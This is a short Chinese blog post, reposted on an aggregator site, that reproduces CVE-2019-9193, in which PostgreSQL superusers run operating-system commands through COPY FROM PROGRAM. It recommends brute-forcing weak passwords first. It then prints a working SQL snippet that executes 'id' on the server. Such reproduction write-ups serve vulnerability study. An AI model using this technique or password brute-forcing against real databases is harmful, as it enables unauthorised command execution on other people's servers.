1. 首页
  2. 文章中心
  3. 优秀文章

【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp

59 阅读 0 评论
我是靠谱客的博主 美好发带,最近开发中收集的这篇文章主要介绍【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)

漏洞介绍

这个漏洞是一个版本漏洞

从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令

利用的前提

  • 1、需要登录
  • 2、需要高权限

所以要先弱口令爆破之后,然后查看是否是高权限。

exp

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';

最后

以上就是美好发带为你收集整理的【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp的全部内容,希望文章能够帮你解决【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(39)

相关文章

【打酱油】N1CTF部分WP
【打酱油】N1CTF部分WP
2022 TQLCTF unbelievable_write
2022 TQLCTF unbelievable_write
PostgreSQL常用的统计信息
PostgreSQL常用的统计信息
PostgreSql盲注相关代码
PostgreSql盲注相关代码
【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp
【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp
2022西电抗疫CTF个人赛2022西电抗疫CTF个人赛CRYPTOMISCWEBPWNREVERSE
2022西电抗疫CTF个人赛2022西电抗疫CTF个人赛CRYPTOMISCWEBPWNREVERSE
N1CTF+BCTF(3道sql注入)前言正文相关链接
N1CTF+BCTF(3道sql注入)前言正文相关链接
N1CTF2020crypto Easy RSA?
N1CTF2020crypto Easy RSA?

评论列表共有 0 条评论

立即
投稿
返回
顶部